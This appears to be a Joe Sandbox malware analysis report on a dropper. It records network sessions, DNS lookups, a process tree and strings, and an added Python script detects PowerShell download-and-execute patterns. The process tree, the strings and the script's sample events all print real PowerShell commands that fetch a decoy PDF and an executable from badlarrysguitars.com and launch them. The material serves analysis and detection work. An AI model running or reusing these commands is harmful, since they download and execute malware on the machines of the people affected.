Dec 6, 2024 15:46:49.592029095 CET | 49767 | 443 | 192.168.2.9 | 50.16.47.176
Dec 6, 2024 15:46:49.592067003 CET | 443 | 49767 | 50.16.47.176 | 192.168.2.9
UDP packets (DNS to 1.1.1.1)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 15:46:32.344727993 CET | 64621 | 53 | 192.168.2.9 | 1.1.1.1
Dec 6, 2024 15:46:33.351093054 CET | 64621 | 53 | 192.168.2.9 | 1.1.1.1
Dec 6, 2024 15:46:33.416661978 CET | 53 | 64621 | 1.1.1.1 | 192.168.2.9
Dec 6, 2024 15:46:33.489651918 CET | 53 | 64621 | 1.1.1.1 | 192.168.2.9
Dec 6, 2024 15:46:45.785567999 CET | 62963 | 53 | 192.168.2.9 | 1.1.1.1
DNS queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 15:46:32.344727993 CET | 192.168.2.9 | 1.1.1.1 | 0x78ee | Standard query (0) | badlarrysguitars.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:46:33.351093054 CET | 192.168.2.9 | 1.1.1.1 | 0x78ee | Standard query (0) | badlarrysguitars.com | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:46:45.785567999 CET | 192.168.2.9 | 1.1.1.1 | 0x3430 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 15:46:26.170120955 CET | 1.1.1.1 | 192.168.2.9 | 0x97e9 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 15:46:26.170120955 CET | 1.1.1.1 | 192.168.2.9 | 0x97e9 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:46:33.416661978 CET | 1.1.1.1 | 192.168.2.9 | 0x78ee | No error (0) | badlarrysguitars.com | | 101.99.75.174 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:46:33.489651918 CET | 1.1.1.1 | 192.168.2.9 | 0x78ee | No error (0) | badlarrysguitars.com | | 101.99.75.174 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:46:46.010988951 CET | 1.1.1.1 | 192.168.2.9 | 0x3430 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 15:46:47.813539982 CET | 1.1.1.1 | 192.168.2.9 | 0x4b19 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:46:47.813539982 CET | 1.1.1.1 | 192.168.2.9 | 0x4b19 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:47:00.499907970 CET | 1.1.1.1 | 192.168.2.9 | 0x3075 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:47:00.499907970 CET | 1.1.1.1 | 192.168.2.9 | 0x3075 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:47:13.536220074 CET | 1.1.1.1 | 192.168.2.9 | 0xce7d | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:47:13.536220074 CET | 1.1.1.1 | 192.168.2.9 | 0xce7d | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:47:37.647252083 CET | 1.1.1.1 | 192.168.2.9 | 0xf9aa | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 15:47:37.647252083 CET | 1.1.1.1 | 192.168.2.9 | 0xf9aa | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                              • badlarrysguitars.com
                                                              • https:
                                                                • p13n.adobe.io
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49718 | 101.99.75.174 | 443 | 7676 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:46:34 UTC | 180 | OUT | GET /share/alert.pdf HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: badlarrysguitars.com
                                                              Connection: Keep-Alive
2024-12-06 14:46:35 UTC | 322 | IN | HTTP/1.1 200 OK
                                                              Date: Fri, 06 Dec 2024 14:46:35 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 126079
                                                              Last-Modified: Fri, 15 Nov 2024 19:44:32 GMT
                                                              Content-Disposition: inline; filename=alert.pdf
                                                              Cache-Control: no-cache
                                                              ETag: "1731699872.0-126079-2713651938"
                                                              Connection: close
                                                              Content-Type: application/pdf
2024-12-06 14:46:35 UTC | 7870 | IN | Data Ascii: %PDF-1.7%1 0 obj <</ColorSpace /DeviceRGB/Subtype /Image/Height 1083/Filter /FlateDecode/Type /XObject/Width 851/BitsPerComponent 8/Length 125221>>streamxe$q\{]wnCp y/gUcHf_f]ud-SUS%I$I$I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49758 | 50.16.47.176 | 443 | 6304 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:46:46 UTC | 1353 | OUT | OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                              Host: p13n.adobe.io
                                                              Connection: keep-alive
                                                              Accept: */*
                                                              Access-Control-Request-Method: GET
                                                              Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
                                                              Origin: https://rna-resource.acrobat.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://rna-resource.acrobat.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
2024-12-06 14:46:47 UTC | 572 | IN | HTTP/1.1 204 No Content
                                                              Server: openresty
                                                              Date: Fri, 06 Dec 2024 14:46:47 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 0
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                              Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                              Access-Control-Allow-Credentials: true
                                                              Access-Control-Expose-Headers: x-request-id
                                                              X-Request-Id: CjJBErKJof0188oT8lxfftBebwD6YNGO
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49767 | 50.16.47.176 | 443 | 6304 | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:46:48 UTC | 1473 | OUT | GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                              Host: p13n.adobe.io
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Chromium";v="105"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                              Accept: application/json, text/javascript, */*; q=0.01
                                                              x-adobe-uuid: fdf9e666-cbf4-4e86-8c83-d46a601e2046
                                                              x-adobe-uuid-type: visitorId
                                                              x-api-key: AdobeReader9
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://rna-resource.acrobat.com
                                                              Accept-Language: en-US,en;q=0.9
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://rna-resource.acrobat.com/
                                                              Accept-Encoding: gzip, deflate, br
2024-12-06 14:46:49 UTC | 608 | IN | HTTP/1.1 200
                                                              Server: openresty
                                                              Date: Fri, 06 Dec 2024 14:46:49 GMT
                                                              Content-Type: application/json;charset=UTF-8
                                                              Content-Length: 4762
                                                              Connection: close
                                                              x-request-id: Nzj3yXLMUVV6tbwXKbYvEsdOxTSVWhme
                                                              vary: accept-encoding
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                              Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                              Access-Control-Allow-Credentials: true
                                                              Access-Control-Expose-Headers: x-request-id
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
2024-12-06 14:46:49 UTC | 4762 | IN | Data Ascii: {"surfaces":{"DC_Reader_Home_LHP_Trial_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","dataType":"application/json","data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7Im


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49768 | 101.99.75.174 | 443 | 1912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-06 14:46:48 UTC | 181 | OUT | GET /private/nois.exe HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: badlarrysguitars.com
                                                              Connection: Keep-Alive
2024-12-06 14:46:49 UTC | 187 | IN | HTTP/1.1 500 INTERNAL SERVER ERROR
                                                              Date: Fri, 06 Dec 2024 14:46:49 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 265
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
2024-12-06 14:46:49 UTC | 265 | IN | Data Ascii: <!doctype html><html lang=en><title>500 Internal Server Error</title><h1>Internal Server Error</h1><p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the applica



Target ID: 0
Start time: 09:46:28
Start date: 06/12/2024
Path: C:\Users\user\Desktop\lg1wwLsmCX.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\lg1wwLsmCX.exe"
Imagebase: 0x400000
File size: 64'456 bytes
MD5 hash: 1CEB5D0CB063290C1F66FCCFED96A220
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 09:46:28
Start date: 06/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 09:46:28
Start date: 06/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                              Target ID:4
                                                              Start time:09:46:35
                                                              Start date:06/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
                                                              Imagebase:0x7ff6153b0000
                                                              File size:5'641'176 bytes
                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:09:46:35
                                                              Start date:06/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                              Imagebase:0x7ff61f300000
                                                              File size:3'581'912 bytes
                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:09:46:36
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                              Imagebase:0x7ff77afe0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:09:46:36
                                                              Start date:06/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                              Imagebase:0x7ff61f300000
                                                              File size:3'581'912 bytes
                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:13
                                                              Start time:09:46:44
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:09:46:44
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

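The process tree above shows the dropper running PowerShell twice: first to fetch and open a decoy PDF (alert.pdf), then to fetch nois.exe, store it in the temp directory under the unrelated name ctfmoon.exe and launch it. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample; it applies the detection logic a SOC would run over process-creation events to those two command lines. It flags a web-request cmdlet, a -OutFile target in the temp directory, a Start-Process of that same file in one command, a download saved under a name that differs from the URL basename, and a document followed by an executable from the same host. The two malicious command lines are copied from the report; the event field names (Image, CommandLine), the benign events and the example.com download are constructed for illustration and are not taken from the report.

```python
"""Flag PowerShell download-and-execute cradles in process-creation events.

Added example; not part of the sandbox report or the sample. The two malicious
command lines are copied from the report's process tree; the event field names
and the benign/low-severity events are constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlparse

# Cmdlets, Windows PowerShell 5.1 aliases and .NET members that fetch from the network.
WEB_REQUEST_RE = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
    r"Start-BitsTransfer|DownloadFile|DownloadString|DownloadData)\b"
)
URL_RE = re.compile(r'''(?i)https?://[^\s"')]+''')
EXEC_RE = re.compile(r"(?i)\b(Start-Process|start|Invoke-Item|Invoke-Expression|iex)\b")
# Temp-directory indicators; the observed cradle resolves it via [IO.Path]::GetTempPath().
TEMP_RE = re.compile(r"(?i)GetTempPath\(\)|%TEMP%|\$env:TEMP|\\AppData\\Local\\Temp\\")
EXECUTABLE_EXTS = {"exe", "dll", "scr", "bat", "cmd", "ps1", "vbs", "js", "hta", "msi"}


@dataclass
class Finding:
    image: str
    url: str
    host: str
    output_name: str
    writes_to_temp: bool
    executes_download: bool
    renamed: bool              # on-disk name differs from the URL's basename
    executable_payload: bool
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        if self.executes_download and self.executable_payload:
            return "high"
        if self.executes_download or self.renamed:
            return "medium"
        return "low"


def _outfile_arg(cmd: str) -> Optional[str]:
    """Return the -OutFile argument; a parenthesised expression is taken whole."""
    m = re.search(r"(?i)-OutFile\s+", cmd)
    if not m:
        return None
    i = m.end()
    if i < len(cmd) and cmd[i] == "(":
        depth = 0
        for j in range(i, len(cmd)):          # balanced-paren walk, nested calls included
            depth += {"(": 1, ")": -1}.get(cmd[j], 0)
            if depth == 0:
                return cmd[i:j + 1]
        return cmd[i:]
    m2 = re.match(r'''"([^"]*)"|'([^']*)'|(\S+)''', cmd[i:])
    return next(g for g in m2.groups() if g is not None) if m2 else None


def _basename(arg: str) -> str:
    """Last quoted literal in the argument (e.g. inside Join-Path), else the bare path's leaf."""
    quoted = re.findall(r'''["']([^"']+)["']''', arg)
    return re.split(r"[\\/]", quoted[-1] if quoted else arg)[-1]


def analyze_event(event: dict) -> Optional[Finding]:
    """Return a Finding for a PowerShell process whose command line downloads content."""
    image, cmd = event.get("Image", ""), event.get("CommandLine", "")
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")) or not WEB_REQUEST_RE.search(cmd):
        return None
    url_m = URL_RE.search(cmd)
    url = url_m.group(0) if url_m else ""
    host = (urlparse(url).hostname or "") if url else ""
    arg = _outfile_arg(cmd) or ""
    out_name = _basename(arg) if arg else ""
    url_base = url.rsplit("/", 1)[-1]
    ext = out_name.rsplit(".", 1)[-1].lower() if "." in out_name else ""
    exec_m = EXEC_RE.search(cmd)
    f = Finding(
        image=image, url=url, host=host, output_name=out_name,
        writes_to_temp=bool(arg and TEMP_RE.search(arg)),
        # "executes" only when the saved file name reappears after the launch verb
        executes_download=bool(exec_m and out_name and out_name.lower() in cmd[exec_m.end():].lower()),
        renamed=bool(url_base and out_name and url_base.lower() != out_name.lower()),
        executable_payload=ext in EXECUTABLE_EXTS,
    )
    checks = [
        (True, "web-request cmdlet in command line"),
        (bool(url), f"fetches {url}"),
        (f.writes_to_temp, "download written to the temp directory"),
        (f.executes_download, "downloaded file launched in the same command"),
        (f.renamed, f"saved as {out_name} although the URL names {url_base}"),
        (f.executable_payload, f"payload has executable extension .{ext}"),
    ]
    f.reasons = [msg for cond, msg in checks if cond]
    return f


def scan(events: list) -> list:
    return [f for f in (analyze_event(e) for e in events) if f is not None]


def decoy_then_payload(findings: list) -> list:
    """Hosts that served a non-executable (decoy) first and an executable afterwards."""
    by_host: dict = {}
    for f in findings:
        by_host.setdefault(f.host, []).append(f)
    hits = []
    for host, fs in by_host.items():
        seen_doc = False
        for f in fs:
            if f.executable_payload and seen_doc:
                hits.append(host)
                break
            seen_doc = seen_doc or not f.executable_payload
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # The two command lines recorded in the report.
    {"Image": PS, "CommandLine": 'powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")'},
    {"Image": PS, "CommandLine": 'powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")'},
    # Constructed benign and low-severity events (not from the report).
    {"Image": PS, "CommandLine": "powershell.exe -c Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"Image": r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe", "CommandLine": r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Documents\invoice.pdf"'},
    {"Image": PS, "CommandLine": r"powershell.exe -c Invoke-WebRequest -Uri https://example.com/tools.zip -OutFile C:\tools\tools.zip"},
]

if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f.severity}] {f.output_name}: " + "; ".join(f.reasons))
    print("decoy-then-payload hosts:", decoy_then_payload(found))
```

Run on the constructed events, the decoy line scores medium (launched, but a PDF), the ctfmoon.exe line scores high (launched, renamed, executable), the plain tools.zip download scores low, and the two benign events produce nothing; the host correlation returns only badlarrysguitars.com. The rename check (nois.exe saved as ctfmoon.exe) is cheap and rarely seen in legitimate automation, so it is worth keeping as an independent signal even when the launch verb is obfuscated.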
                                                                Strings
                                                                • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), xrefs: 0040100B
                                                                • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"), xrefs: 00401016
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1643276097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.1643221914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1643312044.0000000000402000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1643342903.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_lg1wwLsmCX.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")$powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                                • API String ID: 0-3628893888
                                                                • Opcode ID: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                                • Instruction ID: 1508df73bb81b20edbd2416e362e01711401bb553aa95eecbcdc2692af4642b4
                                                                • Opcode Fuzzy Hash: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                                • Instruction Fuzzy Hash: 6C312D31715B408EF7509B66E89038E36B4E788788F50427AEF5DE7BA9EF39C5408744
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1643276097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.1643221914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1643312044.0000000000402000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1643342903.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_lg1wwLsmCX.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                                • Instruction ID: 37283cf5fd5ade48ec6d96cf6941fcaa95a322ea8f96897c16376f9f7fb2df5f
                                                                • Opcode Fuzzy Hash: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                                • Instruction Fuzzy Hash: 89F0FF61B006009EE700DBB5C4513DE3371A74478CF00057AEE0CB7B99DA38CA018794
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1510033384.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: c9e914f1ce835b35214027747c8b5bae58525f0394af00b361ad7d0fed646684
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: 2401677115CB0D4FD744EF0CE451AAAB7E0FB95364F10056EE58AC3651D736E882CB46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tM_L
                                                                • API String ID: 0-4279417444
                                                                • Opcode ID: 342137b1ff50ac7d79a72ff833c7b5d78c86b1ebcd259c448ddbd435840f8505
                                                                • Instruction ID: d8224217d2b9b5b49d87f80432f84080c1db17bbae58d234c614b1d56528d27e
                                                                • Opcode Fuzzy Hash: 342137b1ff50ac7d79a72ff833c7b5d78c86b1ebcd259c448ddbd435840f8505
